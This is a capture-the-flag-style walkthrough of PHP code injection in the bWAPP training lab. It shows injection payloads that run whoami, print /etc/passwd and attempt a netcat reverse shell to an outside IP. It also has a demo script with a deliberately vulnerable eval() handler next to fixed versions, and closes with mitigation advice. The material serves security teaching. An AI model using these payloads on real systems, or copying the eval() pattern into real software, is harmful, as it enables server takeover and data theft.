bWAPP - PHP Code Injection

In this walkthrough, we will be going through the PHP Code Injection vulnerability section from bWAPP Labs. We will be exploring and exploiting PHP Code Injection on a test page and learn how applications are affected by it. So, let’s get started with the hacking without any delay.

PHP Code Injection

Security: Low

  • Setting the security level to Low.

Security level Low

  • The application issues a GET request when the message link is clicked and displays the message in the response. By default the message parameter is set to “test”.

PHP Code Injection

testing

Burpsuite intercept

  • I used the below payloads to check if the application is vulnerable to PHP injection attack and I got the output.

localhost/phpi.php?message=Hello;system("whoami");
localhost/phpi.php?message=Hello;phpinfo()

testing code injection

Code Injection confirmed

localhost/phpi.php?message=Hello;system("cat /etc/passwd")

/etc/passwd output

  • I tried to get a reverse shell using the below payload, however I was unable to for some reason.

localhost/phpi.php?message=test;system("nc 192.168.29.81 4444 -e /bin/bash");

Security: Medium & High

  • The application is not vulnerable at the Medium and High levels: the message parameter is passed through htmlspecialchars() and echoed as plain text, and the vulnerable eval() call is no longer used, so the input is never executed as PHP code.

Application source code
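To make the difference between the levels concrete, here is an added example written for this write-up. It is not bWAPP's phpi.php: the eval() line is my assumed reconstruction of the Low-level pattern visible in the source screenshot, and the hardened variant, the ALLOWED_MESSAGES table and the function names are hypothetical. It shows the vulnerable handler beside the Medium/High handler and a hardened version, and it handles a caveat worth knowing: on PHP 8 a bare word such as Hello is an undefined constant, so the eval() throws before system() is reached and the payload needs a valid first expression.

```php
<?php
// Added example for this write-up (not bWAPP's own phpi.php): a stand-in for
// the three security levels plus a hardened variant. The eval() line is an
// assumed reconstruction of the Low-level pattern; the allowlist, the
// ALLOWED_MESSAGES table and the function names are hypothetical.

declare(strict_types=1);

// Low: the raw parameter is concatenated into PHP source and executed.
// Everything after a ';' in $data becomes a new statement.
function phpi_low(string $data): void
{
    try {
        @eval("echo " . $data . ";");   // assumed Low-level pattern
    } catch (\Throwable $e) {
        // On PHP 8 a bare word like test or Hello is an undefined constant and
        // throws Error, so a payload must start with a valid expression.
        echo "[eval aborted: " . $e->getMessage() . "]";
    }
}

// Medium / High: the parameter is only ever treated as text. htmlspecialchars()
// stops HTML/JS injection on output; code injection disappears because
// eval() is not called at all.
function phpi_medium_high(string $data): string
{
    return htmlspecialchars($data, ENT_QUOTES, "UTF-8");
}

// Hardened: for a "show a message" feature the client should pick a key, not
// supply the text. Resolve it server-side against an allowlist, then encode.
const ALLOWED_MESSAGES = ["test" => "test", "hello" => "Hello, bee!"];

function phpi_hardened(string $key): string
{
    $text = ALLOWED_MESSAGES[$key] ?? ALLOWED_MESSAGES["test"];
    return htmlspecialchars($text, ENT_QUOTES, "UTF-8");
}

// Constructed inputs: the default value, a bare-word payload in the shape the
// walkthrough uses, and a quoted variant that also works on PHP 8.
$inputs = [
    "test",
    'Hello;system("id")',
    '"Hello";system("id")',
];

foreach ($inputs as $in) {
    echo "input    : {$in}\n";
    echo "  low    : ";
    phpi_low($in);
    echo "\n";
    echo "  medium : " . phpi_medium_high($in) . "\n";
    echo "  hardened: " . phpi_hardened($in) . "\n\n";
}
```

Run it with `php phpi_demo.php`. The output of `id` appearing under the "low" line is the injection; the same input under "medium" comes back as an HTML-encoded string, and the hardened handler ignores it entirely and falls back to the default message because the value is not an allowlisted key.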

Conclusion:

So, we finally completed all the security levels for the bWAPP PHP Code Injection vulnerability. We looked into how the application is set up at each level: at Low the message is concatenated into PHP source and executed with eval(), so any extra statement appended after a semicolon runs on the server, while at Medium and High the input is only encoded with htmlspecialchars() and displayed, so there is nothing to execute and nothing to bypass. PHP Code Injection is mitigated by never passing user-controlled data to eval() or similar constructs such as create_function(), assert() with a string argument and the /e modifier of preg_replace(); treat input as data, validate it against an allowlist and encode it for output. Avoiding dangerous command-execution functions like exec(), shell_exec(), system() and passthru() limits what an injected payload can do, and a PHP static analysis tool or security linter can flag eval() and related calls during code review. On that note, I will take your leave and will meet you in the next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.
